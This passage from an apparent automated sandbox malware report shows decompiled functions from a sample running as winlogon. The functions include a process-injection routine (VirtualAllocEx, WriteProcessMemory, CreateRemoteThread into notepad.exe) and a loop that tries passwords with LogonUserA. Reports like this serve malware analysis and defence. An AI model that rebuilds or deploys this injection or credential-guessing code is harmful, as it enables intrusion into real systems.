      • Part of subcall function 00D74CD3: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000), ref: 00D74D1F
      • Part of subcall function 00D74CD3: FreeLibrary.KERNEL32(00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364), ref: 00D74D41
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D72610, Relevance: 1.6, APIs: 1, Instructions: 54
    C-Code - Quality: 72%
    			E00D72610(void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t25;

				E00D723DE( &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 != 0) {
					_t25 = E00D78B26( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t25 != 0) {
						goto L1;
					}
					 *0xd91248 =  *0xd91248 + 1;
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_a16 + 8)) = 0;
					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
					 *((intOrPtr*)(_a16 + 4)) = 0;
					 *_a16 = 0;
					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
					return _a16;
				}
				L1:
				return 0;
			}









    0x00d72621
    0x00d7262d
    0x00d7262e
    0x00d7262f
    0x00d72636
    0x00d7264e
    0x00d72658
    0x00000000
    0x00000000
    0x00d7265d
    0x00d72669
    0x00d72671
    0x00d72677
    0x00d7267d
    0x00d72683
    0x00d7268b
    0x00000000
    0x00d7268e
    0x00d72638
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6FFD9, Relevance: 1.5, APIs: 1, Instructions: 48
    C-Code - Quality: 74%
    			E00D6FFD9(void* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* _t13;
				intOrPtr _t17;
				signed int _t21;
				signed int _t25;
				intOrPtr _t27;
				intOrPtr* _t29;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t29 = _a4;
				if(_t29 != 0) {
					__eflags = _a8 - 1;
					if(__eflags != 0) {
						goto L2;
					} else {
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
						_push(_t21);
						E00D74EF7(__ecx, _t29, __eflags,  &_v12); // executed
						_t25 = _v12 - 0xd53e8000;
						_push(0);
						_push(0x989680);
						asm("sbb eax, 0x19db1de");
						_push(_v8);
						_push(_t25);
						_t17 = E00D7D7E0();
						_v8 = _t21;
						__eflags = _t27 - 7;
						if(__eflags < 0) {
							L7:
							 *_t29 = _t17;
							 *((intOrPtr*)(_t29 + 4)) = _t27;
							_t13 = 1;
							__eflags = 1;
							 *(_t29 + 8) = _t25 * 0x64;
						} else {
							if(__eflags > 0) {
								goto L2;
							} else {
								__eflags = _t17 - 0x93406fff;
								if(_t17 > 0x93406fff) {
									goto L2;
								} else {
									goto L7;
								}
							}
						}
					}
				} else {
					 *((intOrPtr*)(E00D72122())) = 0x16;
					E00D70269();
					L2:
					_t13 = 0;
				}
				return _t13;
			}












    0x00d6ffd9
    0x00d6ffde
    0x00d6ffdf
    0x00d6ffe1
    0x00d6ffe6
    0x00d6fffc
    0x00d70000
    0x00000000
    0x00d70002
    0x00d70002
    0x00d70009
    0x00d7000d
    0x00d7000f
    0x00d7001a
    0x00d70020
    0x00d70022
    0x00d70027
    0x00d7002c
    0x00d7002d
    0x00d7002e
    0x00d70033
    0x00d70037
    0x00d7003a
    0x00d70045
    0x00d70048
    0x00d7004c
    0x00d7004f
    0x00d7004f
    0x00d70050
    0x00d7003c
    0x00d7003c
    0x00000000
    0x00d7003e
    0x00d7003e
    0x00d70043
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d70043
    0x00d7003c
    0x00d7003a
    0x00d6ffe8
    0x00d6ffed
    0x00d6fff3
    0x00d6fff8
    0x00d6fff8
    0x00d6fff8
    0x00d70057

    APIs
      • Part of subcall function 00D74EF7: GetSystemTimeAsFileTime.KERNEL32(00000000,00D70075), ref: 00D74F36
    • __alldvrm.INT64 ref: 00D7002E
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D71890, Relevance: 1.5, APIs: 1, Instructions: 39
    C-Code - Quality: 95%
    			E00D71890(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xd916c0, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00D7105D();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00D72122())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00D702E8(_t15, _t16, _t19, _t21, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}












    0x00d71890
    0x00d71896
    0x00d7189b
    0x00d718a9
    0x00d718a9
    0x00d718af
    0x00d718b1
    0x00d718b1
    0x00d718c8
    0x00d718d1
    0x00d718d9
    0x00000000
    0x00000000
    0x00d718b9
    0x00d718bb
    0x00d718dd
    0x00d718e2
    0x00d718e8
    0x00000000
    0x00d718e8
    0x00d718be
    0x00d718c3
    0x00d718c4
    0x00d718c6
    0x00000000
    0x00000000
    0x00d718c6
    0x00000000
    0x00d718c8
    0x00d718a1
    0x00d718a7
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D7200F,00000001,00000364,?,?,?,00D72127,00D717EB,?,?,00D61B36), ref: 00D718D1
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D62650, Relevance: 1.5, APIs: 1, Instructions: 39
    C-Code - Quality: 68%
    			E00D62650(void* __ecx, WCHAR* __edx, void* __eflags) {
				long _v8;
				long _v12;
				void* _t7;
				signed int _t12;
				void* _t17;

				_push(0xdeefbad7);
				_t17 = __ecx;
				_push(__edx);
				_t7 = E00D61A30(0, __ecx);
				if(_t7 != 0) {
					 *__edx = 0;
					_v12 = 0x103;
					_v8 = 0x103;
					_t12 = LookupAccountSidW(0, _t17, __edx,  &_v12,  &(__edx[0x104]),  &_v8,  &(__edx[0x208])); // executed
					asm("sbb eax, eax");
					return  ~( ~_t12);
				} else {
					return _t7;
				}
			}








    0x00d62657
    0x00d6265c
    0x00d6265e
    0x00d62662
    0x00d6266c
    0x00d62679
    0x00d62683
    0x00d62691
    0x00d626a1
    0x00d626aa
    0x00d626b1
    0x00d62672
    0x00d62672
    0x00d62672

    APIs
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D717FF, Relevance: 1.5, APIs: 1, Instructions: 32
    C-Code - Quality: 94%
    			E00D717FF(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				long _t10;

				_t8 = __ecx;
				_t10 = _a4;
				if(_t10 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00D72122())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t10 == 0) {
					_t10 = _t10 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xd916c0, 0, _t10); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00D7105D();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00D702E8(_t7, _t8, _t9, _t10, __eflags, _t10);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}










    0x00d717ff
    0x00d71805
    0x00d7180b
    0x00d7183d
    0x00d71842
    0x00d71848
    0x00000000
    0x00d71848
    0x00d7180f
    0x00d71811
    0x00d71811
    0x00d71828
    0x00d71831
    0x00d71839
    0x00000000
    0x00000000
    0x00d71819
    0x00d7181b
    0x00000000
    0x00000000
    0x00d7181e
    0x00d71823
    0x00d71824
    0x00d71826
    0x00000000
    0x00000000
    0x00d71826
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D78814, Relevance: 1.5, APIs: 1, Instructions: 15
    C-Code - Quality: 100%
    			E00D78814(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




    0x00d78831
    0x00d78838

    APIs
    • CreateFileW.KERNEL32(00000000,00000000,?,00D78BEF,?,?,00000000), ref: 00D78831
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D717C5, Relevance: 1.3, APIs: 1, Instructions: 15
    C-Code - Quality: 100%
    			E00D717C5(void* _a4) {
				int _t3;
				intOrPtr* _t4;
				intOrPtr _t6;

				if(_a4 != 0) {
					_t3 = HeapFree( *0xd916c0, 0, _a4); // executed
					if(_t3 == 0) {
						_t4 = E00D72122();
						_t6 = E00D720A9(GetLastError());
						 *_t4 = _t6;
						return _t6;
					}
				}
				return _t3;
			}






    0x00d717ce
    0x00d717db
    0x00d717e3
    0x00d717e6
    0x00d717f4
    0x00d717fa
    0x00000000
    0x00d717fc
    0x00d717e3
    0x00d717fe

    APIs
    • HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Non-executed Functions

    Function 00D65DD0, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 223injectionprocessthread
    C-Code - Quality: 89%
    			E00D65DD0(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi, long _a4, long _a8, struct _PROCESS_INFORMATION _a12, long _a28, struct _STARTUPINFOW _a32, void* _a36, signed int _a76, void _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, intOrPtr _a124, intOrPtr _a128, intOrPtr _a132, void* _a140, short _a144, short _a2224, signed int _a4276) {
				void* _v0;
				signed int _t54;
				void _t68;
				void* _t70;
				long _t87;
				void* _t94;
				intOrPtr _t116;
				void* _t119;
				void* _t122;
				WCHAR* _t125;
				_Unknown_base(*)()* _t130;
				signed int _t131;
				signed int _t132;
				signed int _t133;

				_t132 = _t131 & 0xfffffff8;
				E00D7D900();
				_t54 =  *0xd88004; // 0x276b9783
				_a4276 = _t54 ^ _t132;
				_push(__edi);
				_v0 = __ecx;
				_t125 = __edx;
				E00D6D520(__edi,  &_a104, 0, 0x848);
				_t133 = _t132 + 0xc;
				_t116 = GetFileSize;
				_a112 = ExitProcess;
				_a116 = GetFileAttributesW;
				_a120 = CreateFileW;
				_a104 = Sleep;
				_a108 = DeleteFileW;
				_a124 = GetFileSize;
				_a128 = WriteFile;
				_a132 = CloseHandle;
				if(Sleep == 0 || DeleteFileW == 0 || __imp__ExitProcess == 0 || __imp__GetFileAttributesW == 0 || __imp__CreateFileW == 0 || GetFileSize == 0 || WriteFile == 0 || CloseHandle == 0) {
					L10:
					return E00D6ABE4(_a4276 ^ _t133);
				} else {
					_a140 = _v0;
					if(_t125 != 0) {
						E00D6E786( &_a144, 0x40f, _t125);
						_t133 = _t133 + 0xc;
						goto L12;
					} else {
						if(GetModuleFileNameW(GetModuleHandleW(_t125),  &_a144, 0x40f) != 0) {
							L12:
							E00D6D520(_t116,  &_a2224, 0, 0x800);
							_t133 = _t133 + 0xc;
							if(GetWindowsDirectoryW( &_a2224, 0x7ff) == 0) {
								goto L10;
							} else {
								_t119 =  &(( &_a2224)[0xffffffffffffffff]);
								asm("o16 nop [eax+eax]");
								do {
									_t68 =  *(_t119 + 2);
									_t119 = _t119 + 2;
								} while (_t68 != 0);
								asm("xorps xmm0, xmm0");
								_t70 = memcpy(_t119, L"\\system32\\notepad.exe", 0xb << 2);
								asm("movups [esp+0x28], xmm0");
								E00D6D520(L"\\system32\\notepad.exe" + 0x16, _t70, 0, 0x40);
								_t133 = _t133 + 0x18;
								_a76 = _a76 | 0x00000001;
								_a32.cb = 0x44;
								if(CreateProcessW( &_a2224, 0, 0, 0, 0, 0x8000000, 0, 0,  &_a32,  &_a12) == 0) {
									goto L10;
								} else {
									_t122 = VirtualAllocEx(_a12.hProcess, 0, 0x2000, 0x3000, 4);
									if(_t122 == 0) {
										L27:
										TerminateProcess(_a12.hProcess, 0);
									} else {
										_a4 = 0;
										if(WriteProcessMemory(_a12.hProcess, _t122,  &_a104, 0x848,  &_a4) == 0) {
											goto L27;
										} else {
											_v0 = 0;
											_a8 = 0;
											E00D65CB0( &_v0,  &_v0,  &_a8);
											_t87 = _a8;
											_t133 = _t133 + 8;
											if(_t87 == 0 || _v0 == 0 || _t87 >= 0x1000) {
												goto L27;
											} else {
												_t130 = VirtualAllocEx(_a12.hProcess, 0, 0x2000, 0x3000, 4);
												if(_t130 == 0) {
													goto L27;
												} else {
													_a4 = 0;
													if(WriteProcessMemory(_a12.hProcess, _t130, _v0, _a8,  &_a4) == 0 || VirtualProtectEx(_a12.hProcess, _t130, 0x2000, 0x20,  &_a4) == 0) {
														goto L27;
													} else {
														_a28 = 0;
														_t94 = CreateRemoteThread(_a12.hProcess, 0, 0x4000, _t130, _t122, 0,  &_a28);
														if(_t94 == 0 || _t94 == 0xcccccccc || _t94 == 0xffffffff) {
															goto L27;
														}
													}
												}
											}
										}
									}
									CloseHandle(_a12);
									return E00D6ABE4(_a4276 ^ _t133);
								}
							}
						} else {
							goto L10;
						}
					}
				}
			}

















    0x00d65dd3
    0x00d65ddb
    0x00d65de0
    0x00d65de7
    0x00d65df0
    0x00d65dfa
    0x00d65e01
    0x00d65e03
    0x00d65e0e
    0x00d65e1c
    0x00d65e28
    0x00d65e35
    0x00d65e42
    0x00d65e4f
    0x00d65e53
    0x00d65e57
    0x00d65e5e
    0x00d65e65
    0x00d65e6e
    0x00d65ec9
    0x00d65edf
    0x00d65e9b
    0x00d65e9f
    0x00d65eaf
    0x00d65ee7
    0x00d65eec
    0x00000000
    0x00d65eb1
    0x00d65ec7
    0x00d65eef
    0x00d65efe
    0x00d65f03
    0x00d65f1b
    0x00000000
    0x00d65f1d
    0x00d65f24
    0x00d65f27
    0x00d65f30
    0x00d65f30
    0x00d65f34
    0x00d65f37
    0x00d65f4c
    0x00d65f51
    0x00d65f54
    0x00d65f59
    0x00d65f5e
    0x00d65f61
    0x00d65f6a
    0x00d65f99
    0x00000000
    0x00d65f9f
    0x00d65fb9
    0x00d65fbd
    0x00d660bd
    0x00d660c3
    0x00d65fc3
    0x00d65fda
    0x00d65fec
    0x00000000
    0x00d65ff2
    0x00d65ff6
    0x00d66003
    0x00d6600c
    0x00d66011
    0x00d66015
    0x00d6601a
    0x00000000
    0x00d66036
    0x00d6604a
    0x00d6604e
    0x00000000
    0x00d66050
    0x00d66054
    0x00d6606e
    0x00000000
    0x00d6608b
    0x00d6608f
    0x00d660a7
    0x00d660af
    0x00000000
    0x00000000
    0x00d660af
    0x00d6606e
    0x00d6604e
    0x00d6601a
    0x00d65fec
    0x00d660cd
    0x00d660ec
    0x00d660ec
    0x00d65f99
    0x00000000
    0x00000000
    0x00000000
    0x00d65ec7
    0x00d65eaf

    APIs
    • GetModuleHandleW.KERNEL32(?,?,0000040F), ref: 00D65EB8
    • GetModuleFileNameW.KERNEL32(00000000,?,?,0000040F), ref: 00D65EBF
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetWindowsDirectoryW.KERNEL32(?,000007FF), ref: 00D65F13
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00D65F91
    • VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D65FB7
    • WriteProcessMemory.KERNEL32(?,00000000,?,00000848,?), ref: 00D65FE8
    • VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D66048
    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 00D6606A
    • VirtualProtectEx.KERNEL32(?,00000000,00002000,00000020,?), ref: 00D66081
    • CreateRemoteThread.KERNEL32(?,00000000,00004000,00000000,00000000,00000000,?), ref: 00D660A7
    • TerminateProcess.KERNEL32(?,00000000), ref: 00D660C3
    • CloseHandle.KERNEL32(?), ref: 00D660CD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6AAD0, Relevance: 7.6, APIs: 5, Instructions: 77
    C-Code - Quality: 95%
    			E00D6AAD0(WCHAR* __ecx, WCHAR* __edx, WCHAR** _a4) {
				WCHAR* _v8;
				void* _t13;
				void* _t14;
				WCHAR* _t20;
				struct HRSRC__* _t23;
				struct HINSTANCE__* _t30;
				WCHAR* _t32;
				WCHAR** _t36;

				_push(__ecx);
				_v8 = __ecx;
				_t20 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L11:
					return 0;
				} else {
					_t36 = _a4;
					if(_t36 == 0) {
						goto L11;
					} else {
						_t36[1] = 0;
						 *_t36 = 0;
						_t30 = GetModuleHandleW(0);
						if(_t30 == 0) {
							L9:
							return 0;
						} else {
							_t23 = FindResourceW(_t30, _t20, _v8);
							if(_t23 == 0) {
								goto L9;
							} else {
								_t13 = LoadResource(_t30, _t23);
								if(_t13 == 0) {
									goto L9;
								} else {
									_t14 = LockResource(_t13);
									_v8 = _t14;
									if(_t14 == 0) {
										goto L9;
									} else {
										_t32 = SizeofResource(_t30, _t23);
										if(_t32 == 0 || E00D6A6F0(_t32, _t36) == 0) {
											goto L9;
										} else {
											E00D7DAE0( *_t36, _v8, _t32);
											_t36[1] = _t32;
											return 1;
										}
									}
								}
							}
						}
					}
				}
			}











    0x00d6aad3
    0x00d6aad6
    0x00d6aada
    0x00d6aadf
    0x00d6ab80
    0x00d6ab87
    0x00d6aaed
    0x00d6aaed
    0x00d6aaf2
    0x00000000
    0x00d6aaf8
    0x00d6aafb
    0x00d6ab02
    0x00d6ab0e
    0x00d6ab12
    0x00d6ab5a
    0x00d6ab62
    0x00d6ab14
    0x00d6ab1f
    0x00d6ab23
    0x00000000
    0x00d6ab25
    0x00d6ab27
    0x00d6ab2f
    0x00000000
    0x00d6ab31
    0x00d6ab32
    0x00d6ab38
    0x00d6ab3d
    0x00000000
    0x00d6ab3f
    0x00d6ab47
    0x00d6ab4b
    0x00000000
    0x00d6ab63
    0x00d6ab69
    0x00d6ab71
    0x00d6ab7f
    0x00d6ab7f
    0x00d6ab4b
    0x00d6ab3d
    0x00d6ab2f
    0x00d6ab23
    0x00d6ab12
    0x00d6aaf2

    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,00D631A7,?), ref: 00D6AB08
    • FindResourceW.KERNEL32(00000000,?,?), ref: 00D6AB19
    • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB27
    • LockResource.KERNEL32(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB32
    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB41
      • Part of subcall function 00D6A6F0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00D6AB56,?,?,?,?,?,?,00D631A7,?), ref: 00D6A701
      • Part of subcall function 00D6A6F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6A708
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D63920, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183
    C-Code - Quality: 83%
    			E00D63920(int __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				long _v8;
				char _v16;
				signed int _v24;
				char _v280;
				char _v536;
				intOrPtr _v540;
				void* _v544;
				CHAR* _v548;
				void* _v552;
				intOrPtr _v556;
				CHAR* _v560;
				struct _CRITICAL_SECTION _v584;
				intOrPtr _v592;
				char _v596;
				void* __ebp;
				signed int _t45;
				signed int _t46;
				signed int _t55;
				void* _t59;
				void* _t60;
				void* _t65;
				unsigned int _t66;
				void _t69;
				void _t70;
				void* _t73;
				signed int _t80;
				CHAR* _t85;
				char _t92;
				void _t94;
				void _t95;
				signed int _t97;
				signed int _t103;
				intOrPtr _t109;
				intOrPtr _t113;
				CHAR* _t114;
				void* _t115;
				void* _t116;
				signed int _t117;
				CHAR* _t121;
				void* _t124;
				void* _t130;
				intOrPtr _t136;
				int _t138;
				void* _t139;
				void* _t140;
				signed int _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t146;

				_t82 = __ebx;
				_push(0xffffffff);
				_push(E00D7E22B);
				_push( *[fs:0x0]);
				_t143 = _t142 - 0x248;
				_t45 =  *0xd88004; // 0x276b9783
				_t46 = _t45 ^ _t141;
				_v24 = _t46;
				_push(__ebx);
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_v552 = __edx;
				_v556 = __ecx;
				_t85 = _a4;
				_t121 = _a8;
				_t136 = _a12;
				_v548 = _t85;
				_v560 = _t121;
				if(__ecx != 0 && __edx != 0 && _t85 != 0 && _t121 != 0 && _t136 != 0) {
					E00D61F60( &_v596);
					_v8 = 0;
					E00D636A0(__ebx,  &_v596, _t136, _t121, _t136);
					_t92 = _v596;
					_t55 = _v592 - _t92 >> 9;
					if(_t55 == 0) {
						L33:
						_v592 = _t92;
						DeleteCriticalSection( &_v584);
						E00D68340(_t82,  &_v596, _t121);
					} else {
						_t82 = 0;
						if(_t55 != 0) {
							_t113 = 0;
							_v540 = 0;
							do {
								if(_t82 > 0xffffff || _t82 >= _t55) {
									_t59 = 0;
									goto L13;
								} else {
									if(_t55 <= _t82) {
										L34:
										E00D6B97B("invalid vector<T> subscript");
										goto L35;
									} else {
										_t59 = _t113 + _t92;
										L13:
										_push(0xdeefbad7);
										_t17 = _t59 + 0x100; // 0x100
										_t114 = _t17;
										_push(_t114);
										_t60 = E00D61A30(0, _t121);
										_t143 = _t143 + 0x10;
										if(_t60 != 0) {
											_v544 = 0xffffffff;
											_t138 = LogonUserA(_t121, _v548, _t114, 3, 0,  &_v544);
											if(_t138 != 0) {
												goto L18;
											} else {
												GetLastError();
												goto L17;
											}
										} else {
											_t138 = 0;
											L17:
											if(_t138 == 0) {
												goto L32;
											} else {
												L18:
												E00D6D520(_t121,  &_v536, 0, 0x200);
												_t65 = _v552;
												_t144 = _t143 + 0xc;
												_t139 = _t65;
												do {
													_t94 =  *_t65;
													_t65 = _t65 + 1;
												} while (_t94 != 0);
												_t66 = _t65 - _t139;
												_t124 =  &_v536 - 1;
												do {
													_t95 =  *(_t124 + 1);
													_t124 = _t124 + 1;
												} while (_t95 != 0);
												_t97 = _t66 >> 2;
												memcpy(_t139 + _t97 + _t97, _t139, memcpy(_t124, _t139, _t97 << 2) & 0x00000003);
												_t146 = _t144 + 0x18;
												if(_t82 > 0xffffff) {
													L26:
													_t115 = 0;
													goto L27;
												} else {
													_t109 = _v596;
													_t80 = _v592 - _t109 >> 9;
													if(_t82 >= _t80) {
														goto L26;
													} else {
														if(_t80 <= _t82) {
															goto L34;
														} else {
															_t115 = _v540 + _t109;
															L27:
															_t116 = _t115 + 0x100;
															_t140 = _t116;
															do {
																_t69 =  *_t116;
																_t116 = _t116 + 1;
